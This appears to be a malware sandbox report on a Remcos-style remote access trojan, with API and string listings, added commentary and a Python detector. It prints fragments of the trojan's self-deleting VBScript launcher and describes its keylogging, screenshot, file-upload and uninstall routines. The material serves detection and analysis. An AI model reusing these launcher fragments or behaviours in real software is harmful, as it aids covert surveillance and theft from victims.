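The mismatch flagged by `advertised_total_overstates` is a property of the arithmetic shown in the listing, not a separate observation from the report: for a 200000-byte file the sample reports a total of 3 but sends two chunks. A controller implementation that waits for the third chunk would hang, which is worth knowing when writing a replay or emulation harness.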

                      APIs
                        • Part of subcall function 00404A08: connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
                      • __aulldiv.LIBCMT ref: 004065A6
                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
                      • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                        • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                      • API String ID: 1319223106-2190262076
                      • Opcode ID: 048919d7fd5a81af040df54411573ec8a5145bc9ecf892f934884ad1f66b66ff
                      • Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
                      • Opcode Fuzzy Hash: 048919d7fd5a81af040df54411573ec8a5145bc9ecf892f934884ad1f66b66ff
                      • Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: _free$Info
                      • String ID:
                      • API String ID: 2509303402-0
                      • Opcode ID: 7bbae23d08da65fe13313e8619d087693854e34d1332be766e476d8f762dca74
                      • Instruction ID: 1e5099d4cf7091294613e4cd6a63c328f2291409cd47a3a75e98f44bfb697c1d
                      • Opcode Fuzzy Hash: 7bbae23d08da65fe13313e8619d087693854e34d1332be766e476d8f762dca74
                      • Instruction Fuzzy Hash: FEB18E71D002059FEB15AFB9C881BEEBBB4BF08304F14407EE955A7352DB7998498B68

                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 0044958A
                        • Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
                        • Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
                        • Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
                        • Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
                        • Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
                        • Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
                        • Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
                        • Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
                        • Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
                        • Part of subcall function 00448782: _free.LIBCMT ref: 00448841
                        • Part of subcall function 00448782: _free.LIBCMT ref: 00448853
                        • Part of subcall function 00448782: _free.LIBCMT ref: 00448865
                        • Part of subcall function 00448782: _free.LIBCMT ref: 00448877
                      • _free.LIBCMT ref: 0044957F
                        • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                        • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                      • _free.LIBCMT ref: 004495A1
                      • _free.LIBCMT ref: 004495B6
                      • _free.LIBCMT ref: 004495C1
                      • _free.LIBCMT ref: 004495E3
                      • _free.LIBCMT ref: 004495F6
                      • _free.LIBCMT ref: 00449604
                      • _free.LIBCMT ref: 0044960F
                      • _free.LIBCMT ref: 00449647
                      • _free.LIBCMT ref: 0044964E
                      • _free.LIBCMT ref: 0044966B
                      • _free.LIBCMT ref: 00449683
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                      • Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
                      • Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                      • Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 840c13727cd2f055df9e3f45250c10aa30f0a59d5295323c5921bb3661981254
                      • Instruction ID: 0fd459aec3f5e05b68cc896b93c3b77f39616f80babc804ed9fa449a4b9e12b5
                      • Opcode Fuzzy Hash: 840c13727cd2f055df9e3f45250c10aa30f0a59d5295323c5921bb3661981254
                      • Instruction Fuzzy Hash: 0EC10571E40204AFEB20DBA9CC42FEF77F8EB49705F14415AFB05EB282D6B499419798

                      APIs
                        • Part of subcall function 0044EF23: CreateFileW.KERNEL32(00000000,00000000,?,0044F2FE,?,?,00000000,?,0044F2FE,00000000,0000000C), ref: 0044EF40
                      • GetLastError.KERNEL32 ref: 0044F369
                      • __dosmaperr.LIBCMT ref: 0044F370
                      • GetFileType.KERNEL32(00000000), ref: 0044F37C
                      • GetLastError.KERNEL32 ref: 0044F386
                      • __dosmaperr.LIBCMT ref: 0044F38F
                      • CloseHandle.KERNEL32(00000000), ref: 0044F3AF
                      • CloseHandle.KERNEL32(?), ref: 0044F4F9
                      • GetLastError.KERNEL32 ref: 0044F52B
                      • __dosmaperr.LIBCMT ref: 0044F532
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                      • String ID: H
                      • API String ID: 4237864984-2852464175
                      • Opcode ID: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                      • Instruction ID: 8387d8c7474957efea47537ed2c3f831a95fafc38b1db0bb8119202e772c3410
                      • Opcode Fuzzy Hash: 47bb2141c220456fdb7a8c8012237244b82838329f6a58beebc578ef5c24065f
                      • Instruction Fuzzy Hash: 18A15A32A105489FEF19DF68D8417AE7BA0EB06324F14016EF801DB392DB799D16CB5A

                      APIs
                      • __Init_thread_footer.LIBCMT ref: 004091F7
                      • Sleep.KERNEL32(000001F4), ref: 00409202
                      • GetForegroundWindow.USER32 ref: 00409208
                      • GetWindowTextLengthW.USER32(00000000), ref: 00409211
                      • GetWindowTextW.USER32 ref: 00409245
                      • Sleep.KERNEL32(000003E8), ref: 00409313
                        • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                        • Part of subcall function 00408B80: SetEvent.KERNEL32(?,?,?,?,00409CFC,?,?,?,?,?,00000000), ref: 00408BAD
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                      • String ID: [ ${ User has been idle for $ ]$ minutes }
                      • API String ID: 107669343-3343415809
                      • Opcode ID: a6c8a928903d92f7d9192b5741854bc834aefe436945cdbf5aa3212f8be8680a
                      • Instruction ID: 503b2ce70374cf4332f5393007fb2740c98398301deed75f23da1ef1a57f7c11
                      • Opcode Fuzzy Hash: a6c8a928903d92f7d9192b5741854bc834aefe436945cdbf5aa3212f8be8680a
                      • Instruction Fuzzy Hash: A251D3716082415BC314FB25D846A6E77A5AF84348F44093FF842A62E3EF7C9E45C69E

                      APIs
                        • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                        • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                        • Part of subcall function 00410A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                        • Part of subcall function 00410A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                        • Part of subcall function 00410A30: RegCloseKey.ADVAPI32(00000000), ref: 00410A70
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B4E2
                      • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B641
                      • ExitProcess.KERNEL32 ref: 0040B64D
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                      • API String ID: 1913171305-2411266221
                      • Opcode ID: 99087979b48af51e1bd60e67a26d4a29e487769374ba6779ba1c7c4bd500808e
                      • Instruction ID: 1eb9c9899973781d748da32130d6708d7247d8467cae5aa57bbac03f0cab9b6b
                      • Opcode Fuzzy Hash: 99087979b48af51e1bd60e67a26d4a29e487769374ba6779ba1c7c4bd500808e
                      • Instruction Fuzzy Hash: C74150319101185ACB14FB61DC92DEE7779AF60748F10007FF806721E2EF385E4ACA99
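The API and string list above describes the sample's uninstall path: it resolves its own image with GetModuleFileNameW, writes a .vbs under Temp that runs a hidden "cmd /c" command and then deletes itself with DeleteFile(Wscript.ScriptFullName), launches it through ShellExecuteW "open", and calls ExitProcess. The following is an added example (not code from the sample or from Joe Sandbox) that inspects a VBScript body for that launcher pattern. The two literal fragments are taken verbatim from the string list; the sample script text and the path inside it are constructed for the test, and the command the real script passes to "cmd /c" is not shown on the page, so the parser extracts whatever command is present instead of assuming one.

```python
"""Flag a VBScript launcher of the kind the uninstall routine drops (added example).

Only the two literal fragments below come from the report's string list; the
sample script, its path and all function names here are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Verbatim fragments from the routine's string list
SELF_DELETE = 'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)'
SHELL_RUN_PREFIX = 'CreateObject("WScript.Shell").Run "cmd /c ""'

# VBScript doubles a quote to embed one in a string literal, so
#   Run "cmd /c ""X""", 0
# hands   cmd /c "X"   to WScript.Shell with window style 0 (hidden).
_RUN_RE = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c ""(?P<inner>.*?)""",\s*(?P<style>\d+)'
)


@dataclass(frozen=True)
class Finding:
    command: str          # the command line as cmd.exe receives it
    hidden_window: bool   # window style argument was 0
    deletes_itself: bool  # DeleteFile(Wscript.ScriptFullName) present


def inspect_vbs(script: str) -> Optional[Finding]:
    """Return a Finding for a script that launches 'cmd /c' via WScript.Shell, else None."""
    if SHELL_RUN_PREFIX not in script:
        return None
    m = _RUN_RE.search(script)
    if m is None:
        return None
    inner = m.group("inner").replace('""', '"')  # undo VBScript quote doubling
    return Finding(
        command='cmd /c "' + inner + '"',
        hidden_window=m.group("style") == "0",
        deletes_itself=SELF_DELETE in script,
    )


def is_remcos_style_launcher(script: str) -> bool:
    """Hidden 'cmd /c' launch followed by self-deletion: the shape of the dropped .vbs."""
    f = inspect_vbs(script)
    return f is not None and f.hidden_window and f.deletes_itself


# Constructed sample for the test; the path is illustrative, not from the report.
SAMPLE_VBS = (
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\victim\\AppData\\Local\\Temp\\example.exe""", 0\r\n'
    + SELF_DELETE + '\r\n'
)


if __name__ == "__main__":
    print(inspect_vbs(SAMPLE_VBS))
    print("launcher:", is_remcos_style_launcher(SAMPLE_VBS))
```

The check deliberately keys on the combination (hidden window plus self-deletion) rather than on either fragment alone: WScript.Shell.Run with "cmd /c" is common in legitimate scripts, and a script that deletes itself is what makes the dropped file disappear before a responder can collect it, so the extracted command is the artifact worth recording.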

                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355E2
                      • GetLastError.KERNEL32(?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355EF
                      • __dosmaperr.LIBCMT ref: 004355F6
                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435622
                      • GetLastError.KERNEL32(?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043562C
                      • __dosmaperr.LIBCMT ref: 00435633
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D39,?), ref: 00435676
                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435680
                      • __dosmaperr.LIBCMT ref: 00435687
                      • _free.LIBCMT ref: 00435693
                      • _free.LIBCMT ref: 0043569A
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                      • String ID:
                      • API String ID: 2441525078-0
                      • Opcode ID: af4fff882a718f2a0465fbb3afeaba3fd683e49890623f651a00384afc978380
                      • Instruction ID: b5d46763a30f5c02a0768ec9d988a2018c1f619f389f5c820b1df77af5e22da9
                      • Opcode Fuzzy Hash: af4fff882a718f2a0465fbb3afeaba3fd683e49890623f651a00384afc978380
                      • Instruction Fuzzy Hash: 9F314A71400A0ABFDF01AFA5CC46DAF7B78EF08365F10416AF91896291DB39CD21CB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SetEvent.KERNEL32(?,?), ref: 0040540C
                      • GetMessageA.USER32 ref: 004054BC
                      • TranslateMessage.USER32(?), ref: 004054CB
                      • DispatchMessageA.USER32 ref: 004054D6
                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6
                        • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                      • String ID: CloseChat$DisplayMessage$GetMessage
                      • API String ID: 2956720200-749203953
                      • Opcode ID: 6f0a488ed170bcb52ef2918246923dd5e5a9e1f4d173e2a9cbd7c932fcf0f302
                      • Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
                      • Opcode Fuzzy Hash: 6f0a488ed170bcb52ef2918246923dd5e5a9e1f4d173e2a9cbd7c932fcf0f302
                      • Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                      • Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
                      • Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                      • Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CountEventTick
                      • String ID: 8E@
                      • API String ID: 180926312-787191786
                      • Opcode ID: 58bfabe4314d591ab1800f857d9d361a3137679ec485e75fd9a426b21b537fe0
                      • Instruction ID: ea4d81ed4f091483c47e61d79a68d374cc238c57229b35d0877b3eec111e029e
                      • Opcode Fuzzy Hash: 58bfabe4314d591ab1800f857d9d361a3137679ec485e75fd9a426b21b537fe0
                      • Instruction Fuzzy Hash: A0E183316083019BC614FB72D957AEE72A89B95708F40083FF546B71E2EE7C9A44879F
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • __EH_prolog.LIBCMT ref: 0041593D
                      • GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041596F
                        • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                        • Part of subcall function 0041576E: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
                        • Part of subcall function 0041576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858
                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004159FB
                      • Sleep.KERNEL32(000003E8), ref: 00415A81
                      • GetLocalTime.KERNEL32(?), ref: 00415A89
                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415B78
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                      • API String ID: 3280235481-3790400642
                      • Opcode ID: ab062f08af728bb28cda05bd2555192150d35aff8c491bbd658ecb4172a7f536
                      • Instruction ID: a88af923db25c08f263845cfd4b3868e06691e543411564c9f1a5e85300975ae
                      • Opcode Fuzzy Hash: ab062f08af728bb28cda05bd2555192150d35aff8c491bbd658ecb4172a7f536
                      • Instruction Fuzzy Hash: 89517F70A002589ACB14BBB6CC529FE77699F54308F00003FF845AB1E2EF3C5E8587A9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79
                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004136D4
                        • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                      • Sleep.KERNEL32(00000064), ref: 00413700
                      • DeleteFileW.KERNEL32(00000000), ref: 00413734
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                      • API String ID: 2701014334-2001430897
                      • Opcode ID: cbb72141c50a427dd17f7d1e472087e9b5b996b109bcf1605c31d29da97a35f5
                      • Instruction ID: f4a0078ff742d4c0d57fd8ead3e50225e02e9f8c908c9e0bc41a8f95a638bb01
                      • Opcode Fuzzy Hash: cbb72141c50a427dd17f7d1e472087e9b5b996b109bcf1605c31d29da97a35f5
                      • Instruction Fuzzy Hash: 15316F719102095BCB14FBA5DC92AEE7735AF50308F40007FF905771D2EF785E498A99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040EB01
                      • int.LIBCPMT ref: 0040EB14
                        • Part of subcall function 0040B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0040B95D
                        • Part of subcall function 0040B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B977
                      • std::locale::_Getfacet.LIBCPMT ref: 0040EB1D
                      • std::_Facet_Register.LIBCPMT ref: 0040EB54
                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040EB5D
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040EB7B
                      • std::exception::exception.LIBCMT ref: 0040EB8A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                      • String ID: Y@
                      • API String ID: 2287991272-2491949953
                      • Opcode ID: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
                      • Instruction ID: ff1561f7ec47bfe26f0684d44a3055bc139d2b5ebdf4a0be2619b31cd2ef7e2e
                      • Opcode Fuzzy Hash: b3c60572cbba6ae54a95adab48ee80ddae508a23bb924de11908aa76d51c0c2e
                      • Instruction Fuzzy Hash: 6411E232A00218ABCB14FBAAE80199EB778DF40764F10057BF90577291EB78AE0187DD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AD
                      • SetWindowsHookExA.USER32 ref: 004088BB
                      • GetLastError.KERNEL32 ref: 004088C7
                        • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                      • GetMessageA.USER32 ref: 00408915
                      • TranslateMessage.USER32(?), ref: 00408924
                      • DispatchMessageA.USER32 ref: 0040892F
                      Strings
                      • [ERROR], xrefs: 004088ED
                      • Keylogger initialization failure: error , xrefs: 004088DB
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                      • String ID: Keylogger initialization failure: error $[ERROR]
                      • API String ID: 3219506041-2451335947
                      • Opcode ID: b62815908006d671b3ba6b01ffda31f0ef201653c0c6da435154935a0b38062a
                      • Instruction ID: 34009541f3e87155e43b52d28ab51065b23688c1b97c42bbbbbfc9b875d1dcea
                      • Opcode Fuzzy Hash: b62815908006d671b3ba6b01ffda31f0ef201653c0c6da435154935a0b38062a
                      • Instruction Fuzzy Hash: 5E11BF726002016BC3107FB69D0986B77ECEB91756B10063EF886E2191EF74C504C7AB
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: abd92cef6058376eee906444e9d74b82ad6f4ac93f3cb8c56c23ee022f772796
                      • Instruction ID: 967283b79ba0ff2862e9fd1e91011e9ab355d2b8f59743005224cd781b83b7a3
                      • Opcode Fuzzy Hash: abd92cef6058376eee906444e9d74b82ad6f4ac93f3cb8c56c23ee022f772796
                      • Instruction Fuzzy Hash: 6EC11B70D05249AFEF11EFA8C841BAEBBB4BF1A314F05415AE54097392C7789941CF6B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E981
                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA04
                      • __alloca_probe_16.LIBCMT ref: 0044EA3C
                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044EBAE,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA97
                      • __alloca_probe_16.LIBCMT ref: 0044EAE6
                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EAAE
                        • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EB2A
                      • __freea.LIBCMT ref: 0044EB55
                      • __freea.LIBCMT ref: 0044EB61
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                      • String ID:
                      • API String ID: 201697637-0
                      • Opcode ID: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
                      • Instruction ID: 57d3b8f3912e80867dbd5bea15d3c0571bce0196d8e9b81a223875e0514adfa6
                      • Opcode Fuzzy Hash: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
                      • Instruction Fuzzy Hash: 9791C2B1E002569AEF208E66C841AAFBBA5FF09754F14066BE805E7281D739DC418769
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                        • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                        • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                        • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                        • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                      • _memcmp.LIBVCRUNTIME ref: 0043EC78
                      • _free.LIBCMT ref: 0043ECE9
                      • _free.LIBCMT ref: 0043ED02
                      • _free.LIBCMT ref: 0043ED34
                      • _free.LIBCMT ref: 0043ED3D
                      • _free.LIBCMT ref: 0043ED49
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorLast$_abort_memcmp
                      • String ID: C
                      • API String ID: 1679612858-1037565863
                      • Opcode ID: 396cf42111b30fdd357e3ce95326dce3266439ae5a60f4affbd4cac6878eaba6
                      • Instruction ID: 95dbb2c384f2b4054f08a0819f6185acf069c750c5e84a8d12f5530653077751
                      • Opcode Fuzzy Hash: 396cf42111b30fdd357e3ce95326dce3266439ae5a60f4affbd4cac6878eaba6
                      • Instruction Fuzzy Hash: 81B12B7590221ADFDB24DF19C884AAEB7B4FF08314F1055AEE94AA7390D735AE90CF44
                      Uniqueness

